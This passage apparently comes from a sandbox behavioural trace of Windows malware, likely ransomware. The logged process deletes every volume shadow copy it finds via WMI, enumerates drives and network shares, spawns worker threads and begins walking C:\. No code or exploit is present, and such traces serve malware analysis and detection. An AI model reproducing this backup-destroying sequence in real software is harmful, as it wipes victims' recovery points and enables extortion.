This=0x309a58, lTimeout=-1, uCount=0x1, apObjects=0x4ebea28, puReturned=0x4ebea68 | out: apObjects=0x4ebea28*=0x318780, puReturned=0x4ebea68*=0x1) returned 0x0 [0128.254] IWbemClassObject:Get (in: This=0x318780, 
wszName="id", lFlags=0, pVal=0x4ebe9f4*(varType=0x0, wReserved1=0x2d, wReserved2=0xea30, wReserved3=0x4eb, varVal1=0x2d2574, varVal2=0xf40023), pType=0x0, plFlavor=0x0 | out: pVal=0x4ebe9f4*(varType=0x8, wReserved1=0x2d, wReserved2=0xea30, wReserved3=0x4eb, varVal1="{7C5A2FCE-6AB8-4709-BFA7-5927A1C31AC4}", varVal2=0xf40023), pType=0x0, plFlavor=0x0) returned 0x0 [0128.254] lstrlenW (lpString="{7C5A2FCE-6AB8-4709-BFA7-5927A1C31AC4}") returned 38 [0128.254] GetProcessHeap () returned 0x270000 [0128.254] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x80) returned 0x2d24e8 [0128.255] lstrlenW (lpString="{7C5A2FCE-6AB8-4709-BFA7-5927A1C31AC4}") returned 38 [0128.255] wnsprintfW (in: pszDest=0x2d24e8, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{7C5A2FCE-6AB8-4709-BFA7-5927A1C31AC4}'") returned 60 [0128.255] IWbemServices:DeleteInstance (in: This=0x4271938, strObjectPath="Win32_ShadowCopy.ID='{7C5A2FCE-6AB8-4709-BFA7-5927A1C31AC4}'", lFlags=0, pCtx=0x316718, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0130.441] GetProcessHeap () returned 0x270000 [0130.442] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2d24e8 | out: hHeap=0x270000) returned 1 [0130.442] IUnknown:Release (This=0x318780) returned 0x0 [0130.442] IEnumWbemClassObject:Next (in: This=0x309a58, lTimeout=-1, uCount=0x1, apObjects=0x4ebea28, puReturned=0x4ebea68 | out: apObjects=0x4ebea28*=0x318780, puReturned=0x4ebea68*=0x1) returned 0x0 [0130.443] IWbemClassObject:Get (in: This=0x318780, wszName="id", lFlags=0, pVal=0x4ebe9f4*(varType=0x0, wReserved1=0x2d, wReserved2=0xea30, wReserved3=0x4eb, varVal1=0x2d25fc, varVal2=0xf40023), pType=0x0, plFlavor=0x0 | out: pVal=0x4ebe9f4*(varType=0x8, wReserved1=0x2d, wReserved2=0xea30, wReserved3=0x4eb, varVal1="{5E8A808F-BD17-4BF1-9452-FE34D967D19F}", varVal2=0xf40023), pType=0x0, plFlavor=0x0) returned 0x0 [0130.444] lstrlenW (lpString="{5E8A808F-BD17-4BF1-9452-FE34D967D19F}") returned 38 [0130.444] 
GetProcessHeap () returned 0x270000 [0130.444] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x80) returned 0x2d24e8 [0130.444] lstrlenW (lpString="{5E8A808F-BD17-4BF1-9452-FE34D967D19F}") returned 38 [0130.444] wnsprintfW (in: pszDest=0x2d24e8, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{5E8A808F-BD17-4BF1-9452-FE34D967D19F}'") returned 60 [0130.444] IWbemServices:DeleteInstance (in: This=0x4271938, strObjectPath="Win32_ShadowCopy.ID='{5E8A808F-BD17-4BF1-9452-FE34D967D19F}'", lFlags=0, pCtx=0x316718, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0132.426] GetProcessHeap () returned 0x270000 [0132.427] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2d24e8 | out: hHeap=0x270000) returned 1 [0132.427] IUnknown:Release (This=0x318780) returned 0x0 [0132.427] IEnumWbemClassObject:Next (in: This=0x309a58, lTimeout=-1, uCount=0x1, apObjects=0x4ebea28, puReturned=0x4ebea68 | out: apObjects=0x4ebea28*=0x318780, puReturned=0x4ebea68*=0x1) returned 0x0 [0132.429] IWbemClassObject:Get (in: This=0x318780, wszName="id", lFlags=0, pVal=0x4ebe9f4*(varType=0x0, wReserved1=0x2d, wReserved2=0xea30, wReserved3=0x4eb, varVal1=0x2d2574, varVal2=0xf40023), pType=0x0, plFlavor=0x0 | out: pVal=0x4ebe9f4*(varType=0x8, wReserved1=0x2d, wReserved2=0xea30, wReserved3=0x4eb, varVal1="{C446F22D-39D8-4005-8814-B78EDB2DE869}", varVal2=0xf40023), pType=0x0, plFlavor=0x0) returned 0x0 [0132.429] lstrlenW (lpString="{C446F22D-39D8-4005-8814-B78EDB2DE869}") returned 38 [0132.429] GetProcessHeap () returned 0x270000 [0132.429] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x80) returned 0x2d24e8 [0132.429] lstrlenW (lpString="{C446F22D-39D8-4005-8814-B78EDB2DE869}") returned 38 [0132.429] wnsprintfW (in: pszDest=0x2d24e8, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{C446F22D-39D8-4005-8814-B78EDB2DE869}'") returned 60 [0132.429] IWbemServices:DeleteInstance (in: This=0x4271938, 
strObjectPath="Win32_ShadowCopy.ID='{C446F22D-39D8-4005-8814-B78EDB2DE869}'", lFlags=0, pCtx=0x316718, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0134.612] GetProcessHeap () returned 0x270000 [0134.612] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2d24e8 | out: hHeap=0x270000) returned 1 [0134.612] IUnknown:Release (This=0x318780) returned 0x0 [0134.612] IEnumWbemClassObject:Next (in: This=0x309a58, lTimeout=-1, uCount=0x1, apObjects=0x4ebea28, puReturned=0x4ebea68 | out: apObjects=0x4ebea28*=0x2e7f50, puReturned=0x4ebea68*=0x1) returned 0x0 [0134.614] IWbemClassObject:Get (in: This=0x2e7f50, wszName="id", lFlags=0, pVal=0x4ebe9f4*(varType=0x0, wReserved1=0x2d, wReserved2=0xea30, wReserved3=0x4eb, varVal1=0x2d25fc, varVal2=0xf40023), pType=0x0, plFlavor=0x0 | out: pVal=0x4ebe9f4*(varType=0x8, wReserved1=0x2d, wReserved2=0xea30, wReserved3=0x4eb, varVal1="{CA5E7ABA-44B9-4A67-8CEA-48F7EF39E286}", varVal2=0xf40023), pType=0x0, plFlavor=0x0) returned 0x0 [0134.614] lstrlenW (lpString="{CA5E7ABA-44B9-4A67-8CEA-48F7EF39E286}") returned 38 [0134.614] GetProcessHeap () returned 0x270000 [0134.614] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x80) returned 0x2d24e8 [0134.614] lstrlenW (lpString="{CA5E7ABA-44B9-4A67-8CEA-48F7EF39E286}") returned 38 [0134.614] wnsprintfW (in: pszDest=0x2d24e8, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{CA5E7ABA-44B9-4A67-8CEA-48F7EF39E286}'") returned 60 [0134.614] IWbemServices:DeleteInstance (in: This=0x4271938, strObjectPath="Win32_ShadowCopy.ID='{CA5E7ABA-44B9-4A67-8CEA-48F7EF39E286}'", lFlags=0, pCtx=0x316718, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0136.727] GetProcessHeap () returned 0x270000 [0136.728] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2d24e8 | out: hHeap=0x270000) returned 1 [0136.728] IUnknown:Release (This=0x2e7f50) returned 0x0 [0136.728] IEnumWbemClassObject:Next (in: This=0x309a58, lTimeout=-1, uCount=0x1, apObjects=0x4ebea28, 
puReturned=0x4ebea68 | out: apObjects=0x4ebea28*=0x2e7f50, puReturned=0x4ebea68*=0x1) returned 0x0 [0136.731] IWbemClassObject:Get (in: This=0x2e7f50, wszName="id", lFlags=0, pVal=0x4ebe9f4*(varType=0x0, wReserved1=0x2d, wReserved2=0xea30, wReserved3=0x4eb, varVal1=0x2d2574, varVal2=0xf40023), pType=0x0, plFlavor=0x0 | out: pVal=0x4ebe9f4*(varType=0x8, wReserved1=0x2d, wReserved2=0xea30, wReserved3=0x4eb, varVal1="{7FDBE5D0-4D96-4E22-BF66-4C104B34E1BC}", varVal2=0xf40023), pType=0x0, plFlavor=0x0) returned 0x0 [0136.731] lstrlenW (lpString="{7FDBE5D0-4D96-4E22-BF66-4C104B34E1BC}") returned 38 [0136.731] GetProcessHeap () returned 0x270000 [0136.731] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x80) returned 0x2d24e8 [0136.731] lstrlenW (lpString="{7FDBE5D0-4D96-4E22-BF66-4C104B34E1BC}") returned 38 [0136.731] wnsprintfW (in: pszDest=0x2d24e8, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{7FDBE5D0-4D96-4E22-BF66-4C104B34E1BC}'") returned 60 [0136.731] IWbemServices:DeleteInstance (in: This=0x4271938, strObjectPath="Win32_ShadowCopy.ID='{7FDBE5D0-4D96-4E22-BF66-4C104B34E1BC}'", lFlags=0, pCtx=0x316718, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0138.230] GetProcessHeap () returned 0x270000 [0138.231] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2d24e8 | out: hHeap=0x270000) returned 1 [0138.231] IUnknown:Release (This=0x2e7f50) returned 0x0 [0138.231] IEnumWbemClassObject:Next (in: This=0x309a58, lTimeout=-1, uCount=0x1, apObjects=0x4ebea28, puReturned=0x4ebea68 | out: apObjects=0x4ebea28*=0x2e7f50, puReturned=0x4ebea68*=0x1) returned 0x0 [0138.233] IWbemClassObject:Get (in: This=0x2e7f50, wszName="id", lFlags=0, pVal=0x4ebe9f4*(varType=0x0, wReserved1=0x2d, wReserved2=0xea30, wReserved3=0x4eb, varVal1=0x2d25fc, varVal2=0xf40023), pType=0x0, plFlavor=0x0 | out: pVal=0x4ebe9f4*(varType=0x8, wReserved1=0x2d, wReserved2=0xea30, wReserved3=0x4eb, varVal1="{4E8DC638-E2E6-42CE-97D7-0636246C3FE4}", 
varVal2=0xf40023), pType=0x0, plFlavor=0x0) returned 0x0 [0138.233] lstrlenW (lpString="{4E8DC638-E2E6-42CE-97D7-0636246C3FE4}") returned 38 [0138.233] GetProcessHeap () returned 0x270000 [0138.233] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x80) returned 0x2d24e8 [0138.233] lstrlenW (lpString="{4E8DC638-E2E6-42CE-97D7-0636246C3FE4}") returned 38 [0138.233] wnsprintfW (in: pszDest=0x2d24e8, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{4E8DC638-E2E6-42CE-97D7-0636246C3FE4}'") returned 60 [0138.233] IWbemServices:DeleteInstance (in: This=0x4271938, strObjectPath="Win32_ShadowCopy.ID='{4E8DC638-E2E6-42CE-97D7-0636246C3FE4}'", lFlags=0, pCtx=0x316718, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0139.913] GetProcessHeap () returned 0x270000 [0139.913] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2d24e8 | out: hHeap=0x270000) returned 1 [0139.914] IUnknown:Release (This=0x2e7f50) returned 0x0 [0139.914] IEnumWbemClassObject:Next (in: This=0x309a58, lTimeout=-1, uCount=0x1, apObjects=0x4ebea28, puReturned=0x4ebea68 | out: apObjects=0x4ebea28*=0x2e7f50, puReturned=0x4ebea68*=0x1) returned 0x0 [0139.916] IWbemClassObject:Get (in: This=0x2e7f50, wszName="id", lFlags=0, pVal=0x4ebe9f4*(varType=0x0, wReserved1=0x2d, wReserved2=0xea30, wReserved3=0x4eb, varVal1=0x2d2574, varVal2=0xf40023), pType=0x0, plFlavor=0x0 | out: pVal=0x4ebe9f4*(varType=0x8, wReserved1=0x2d, wReserved2=0xea30, wReserved3=0x4eb, varVal1="{053E5C4B-AC14-41B6-8FD9-E0F985D0281C}", varVal2=0xf40023), pType=0x0, plFlavor=0x0) returned 0x0 [0139.916] lstrlenW (lpString="{053E5C4B-AC14-41B6-8FD9-E0F985D0281C}") returned 38 [0139.916] GetProcessHeap () returned 0x270000 [0139.916] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x80) returned 0x2d24e8 [0139.916] lstrlenW (lpString="{053E5C4B-AC14-41B6-8FD9-E0F985D0281C}") returned 38 [0139.916] wnsprintfW (in: pszDest=0x2d24e8, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: 
pszDest="Win32_ShadowCopy.ID='{053E5C4B-AC14-41B6-8FD9-E0F985D0281C}'") returned 60 [0139.916] IWbemServices:DeleteInstance (in: This=0x4271938, strObjectPath="Win32_ShadowCopy.ID='{053E5C4B-AC14-41B6-8FD9-E0F985D0281C}'", lFlags=0, pCtx=0x316718, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0142.105] GetProcessHeap () returned 0x270000 [0142.105] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2d24e8 | out: hHeap=0x270000) returned 1 [0142.105] IUnknown:Release (This=0x2e7f50) returned 0x0 [0142.105] IEnumWbemClassObject:Next (in: This=0x309a58, lTimeout=-1, uCount=0x1, apObjects=0x4ebea28, puReturned=0x4ebea68 | out: apObjects=0x4ebea28*=0x2e7f50, puReturned=0x4ebea68*=0x1) returned 0x0 [0142.107] IWbemClassObject:Get (in: This=0x2e7f50, wszName="id", lFlags=0, pVal=0x4ebe9f4*(varType=0x0, wReserved1=0x2d, wReserved2=0xea30, wReserved3=0x4eb, varVal1=0x2d25fc, varVal2=0xf40023), pType=0x0, plFlavor=0x0 | out: pVal=0x4ebe9f4*(varType=0x8, wReserved1=0x2d, wReserved2=0xea30, wReserved3=0x4eb, varVal1="{94982F36-7196-40C7-AE66-35750915EE46}", varVal2=0xf40023), pType=0x0, plFlavor=0x0) returned 0x0 [0142.107] lstrlenW (lpString="{94982F36-7196-40C7-AE66-35750915EE46}") returned 38 [0142.107] GetProcessHeap () returned 0x270000 [0142.107] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x80) returned 0x2d24e8 [0142.107] lstrlenW (lpString="{94982F36-7196-40C7-AE66-35750915EE46}") returned 38 [0142.107] wnsprintfW (in: pszDest=0x2d24e8, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{94982F36-7196-40C7-AE66-35750915EE46}'") returned 60 [0142.107] IWbemServices:DeleteInstance (in: This=0x4271938, strObjectPath="Win32_ShadowCopy.ID='{94982F36-7196-40C7-AE66-35750915EE46}'", lFlags=0, pCtx=0x316718, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0142.197] GetProcessHeap () returned 0x270000 [0142.197] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2d24e8 | out: hHeap=0x270000) returned 1 [0142.197] 
IUnknown:Release (This=0x2e7f50) returned 0x0 [0142.197] IEnumWbemClassObject:Next (in: This=0x309a58, lTimeout=-1, uCount=0x1, apObjects=0x4ebea28, puReturned=0x4ebea68 | out: apObjects=0x4ebea28*=0x2e7f50, puReturned=0x4ebea68*=0x0) returned 0x1 [0142.202] WbemLocator:IUnknown:Release (This=0x4271938) returned 0x0 [0142.204] WbemLocator:IUnknown:Release (This=0x42907c0) returned 0x0 [0142.205] WbemContext:IUnknown:Release (This=0x316718) returned 0x0 [0142.207] GetDriveTypeW (lpRootPathName="Q:\\") returned 0x1 [0142.207] GetDriveTypeW (lpRootPathName="W:\\") returned 0x1 [0142.208] GetDriveTypeW (lpRootPathName="E:\\") returned 0x1 [0142.208] GetDriveTypeW (lpRootPathName="R:\\") returned 0x1 [0142.208] GetDriveTypeW (lpRootPathName="T:\\") returned 0x1 [0142.208] GetDriveTypeW (lpRootPathName="Y:\\") returned 0x1 [0142.208] GetDriveTypeW (lpRootPathName="U:\\") returned 0x1 [0142.208] GetDriveTypeW (lpRootPathName="I:\\") returned 0x1 [0142.209] GetDriveTypeW (lpRootPathName="O:\\") returned 0x1 [0142.209] GetDriveTypeW (lpRootPathName="P:\\") returned 0x1 [0142.209] GetDriveTypeW (lpRootPathName="S:\\") returned 0x1 [0142.209] GetDriveTypeW (lpRootPathName="D:\\") returned 0x1 [0142.209] GetDriveTypeW (lpRootPathName="F:\\") returned 0x1 [0142.210] GetDriveTypeW (lpRootPathName="G:\\") returned 0x1 [0142.210] GetDriveTypeW (lpRootPathName="H:\\") returned 0x1 [0142.210] GetDriveTypeW (lpRootPathName="J:\\") returned 0x1 [0142.210] GetDriveTypeW (lpRootPathName="K:\\") returned 0x1 [0142.210] GetDriveTypeW (lpRootPathName="L:\\") returned 0x1 [0142.211] GetDriveTypeW (lpRootPathName="Z:\\") returned 0x1 [0142.211] GetDriveTypeW (lpRootPathName="X:\\") returned 0x1 [0142.211] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0142.211] GetDriveTypeW (lpRootPathName="V:\\") returned 0x1 [0142.211] GetDriveTypeW (lpRootPathName="B:\\") returned 0x1 [0142.211] GetDriveTypeW (lpRootPathName="N:\\") returned 0x1 [0142.212] GetDriveTypeW (lpRootPathName="M:\\") 
returned 0x1 [0142.212] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0142.212] GetProcessHeap () returned 0x270000 [0142.212] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x42f3f28 [0142.214] GetProcessHeap () returned 0x270000 [0142.214] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x4303f30 [0142.216] FindFirstVolumeW (in: lpszVolumeName=0x42f3f28, cchBufferLength=0x8000 | out: lpszVolumeName="\\\\?\\Volume{36c5f042-7156-11eb-8857-806e6f6e6963}\\") returned 0x329c18 [0142.216] GetVolumePathNamesForVolumeNameW (in: lpszVolumeName="\\\\?\\Volume{36c5f042-7156-11eb-8857-806e6f6e6963}\\", lpszVolumePathNames=0x4ebe8d0, cchBufferLength=0x78, lpcchReturnLength=0x4ebea94 | out: lpszVolumePathNames=0x4ebe8d0, lpcchReturnLength=0x4ebea94) returned 1 [0142.217] lstrlenW (lpString="C:\\") returned 3 [0142.217] FindNextVolumeW (in: hFindVolume=0x329c18, lpszVolumeName=0x42f3f28, cchBufferLength=0x7fff | out: hFindVolume=0x329c18, lpszVolumeName="\\\\?\\Volume{36c5f042-7156-11eb-8857-806e6f6e6963}\\") returned 0 [0142.217] FindVolumeClose (hFindVolume=0x329c18) returned 1 [0142.217] GetProcessHeap () returned 0x270000 [0142.218] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x4303f30 | out: hHeap=0x270000) returned 1 [0142.218] GetProcessHeap () returned 0x270000 [0142.219] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x42f3f28 | out: hHeap=0x270000) returned 1 [0142.219] CreateIoCompletionPort (FileHandle=0xffffffff, ExistingCompletionPort=0x0, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x3a0 [0142.219] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x44f2770, lpParameter=0x3a0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x424 [0142.220] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x44f2770, lpParameter=0x3a0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x428 [0142.221] CreateThread (in: 
lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x44f2770, lpParameter=0x3a0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x394 [0142.221] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x44f2770, lpParameter=0x3a0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x398 [0142.222] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x44f2770, lpParameter=0x3a0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x530 [0142.222] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x44f2770, lpParameter=0x3a0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x534 [0142.223] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x44f2770, lpParameter=0x3a0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x538 [0142.224] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x44f2770, lpParameter=0x3a0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x53c [0142.227] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x13, lpNetResource=0x0, lphEnum=0x4ebea54 | out: lphEnum=0x4ebea54*=0x42f2fc0) returned 0x0 [0142.758] GetProcessHeap () returned 0x270000 [0142.758] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x4000) returned 0x42f7f28 [0142.758] WNetEnumResourceW (in: hEnum=0x42f2fc0, lpcCount=0x4ebea80, lpBuffer=0x42f7f28, lpBufferSize=0x4ebea58 | out: lpcCount=0x4ebea80, lpBuffer=0x42f7f28, lpBufferSize=0x4ebea58) returned 0x0 [0142.758] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x13, lpNetResource=0x42f7f28, lphEnum=0x4ebe730 | out: lphEnum=0x4ebe730*=0x42bb1c0) returned 0x0 [0142.762] GetProcessHeap () returned 0x270000 [0142.762] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x4000) returned 0x42fbf30 [0142.763] WNetEnumResourceW (in: hEnum=0x42bb1c0, lpcCount=0x4ebe75c, lpBuffer=0x42fbf30, 
lpBufferSize=0x4ebe734 | out: lpcCount=0x4ebe75c, lpBuffer=0x42fbf30, lpBufferSize=0x4ebe734) returned 0x103 [0142.763] GetProcessHeap () returned 0x270000 [0142.763] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x42fbf30 | out: hHeap=0x270000) returned 1 [0142.763] WNetCloseEnum (hEnum=0x42bb1c0) returned 0x0 [0142.763] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x13, lpNetResource=0x42f7f48, lphEnum=0x4ebe730 | out: lphEnum=0x4ebe730*=0x42bb1c0) returned 0x4b8 [0155.006] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x13, lpNetResource=0x42f7f68, lphEnum=0x4ebe730 | out: lphEnum=0x4ebe730*=0x42bb1c0) returned 0x4c6 [0155.007] WNetEnumResourceW (in: hEnum=0x42f2fc0, lpcCount=0x4ebea80, lpBuffer=0x42f7f28, lpBufferSize=0x4ebea58 | out: lpcCount=0x4ebea80, lpBuffer=0x42f7f28, lpBufferSize=0x4ebea58) returned 0x103 [0155.007] GetProcessHeap () returned 0x270000 [0155.008] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x42f7f28 | out: hHeap=0x270000) returned 1 [0155.008] WNetCloseEnum (hEnum=0x42f2fc0) returned 0x0 [0155.008] GetLogicalDrives () returned 0x4 [0155.008] GetProcessHeap () returned 0x270000 [0155.008] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x42fdf30 [0155.009] wnsprintfW (in: pszDest=0x42fdf30, cchDest=32768, pszFmt="\\\\?\\%c:" | out: pszDest="\\\\?\\C:") returned 6 [0155.009] GetDriveTypeW (lpRootPathName="\\\\?\\C:") returned 0x1 [0155.009] GetProcessHeap () returned 0x270000 [0155.009] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x430df38 [0155.010] lstrcpyW (in: lpString1=0x430df38, lpString2="\\\\?\\C:" | out: lpString1="\\\\?\\C:") returned="\\\\?\\C:" [0155.010] lstrcatW (in: lpString1="\\\\?\\C:", lpString2="\\*" | out: lpString1="\\\\?\\C:\\*") returned="\\\\?\\C:\\*" [0155.010] FindFirstFileW (in: lpFileName="\\\\?\\C:\\*", lpFindFileData=0x4ebe784 | out: lpFindFileData=0x4ebe784*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xdbbd37a6, 
ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xd6898390, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd6898390, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x14, dwReserved1=0x4ebe844, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x42f2fc0 [0155.011] wnsprintfW (in: pszDest=0x430df38, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\$Recycle.Bin") returned 19 [0155.011] GetProcessHeap () returned 0x270000 [0155.011] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.012] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\$Recycle.Bin" | out: lpString1="\\\\?\\C:\\$Recycle.Bin") returned="\\\\?\\C:\\$Recycle.Bin" [0155.012] lstrcatW (in: lpString1="\\\\?\\C:\\$Recycle.Bin", lpString2="\\*" | out: lpString1="\\\\?\\C:\\$Recycle.Bin\\*") returned="\\\\?\\C:\\$Recycle.Bin\\*" [0155.012] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$Recycle.Bin\\*", lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xdbbd37a6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xd6898390, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd6898390, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x76, cFileName=".", cAlternateFileName="")) returned 0x42f30c0 [0155.013] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xdbbd37a6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xd6898390, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd6898390, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x76, cFileName="..", cAlternateFileName="")) returned 1 
[0155.013] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd6898390, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd6898390, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd6898390, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x76, cFileName="S-1-5-21-3683305739-1236715609-858405165-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0155.013] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3683305739-1236715609-858405165-1000") returned 65 [0155.013] GetProcessHeap () returned 0x270000 [0155.013] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0155.015] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3683305739-1236715609-858405165-1000" | out: lpString1="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3683305739-1236715609-858405165-1000") returned="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3683305739-1236715609-858405165-1000" [0155.015] lstrcatW (in: lpString1="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3683305739-1236715609-858405165-1000", lpString2="\\*" | out: lpString1="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3683305739-1236715609-858405165-1000\\*") returned="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3683305739-1236715609-858405165-1000\\*" [0155.015] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3683305739-1236715609-858405165-1000\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd6898390, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd6898390, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd6898390, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 
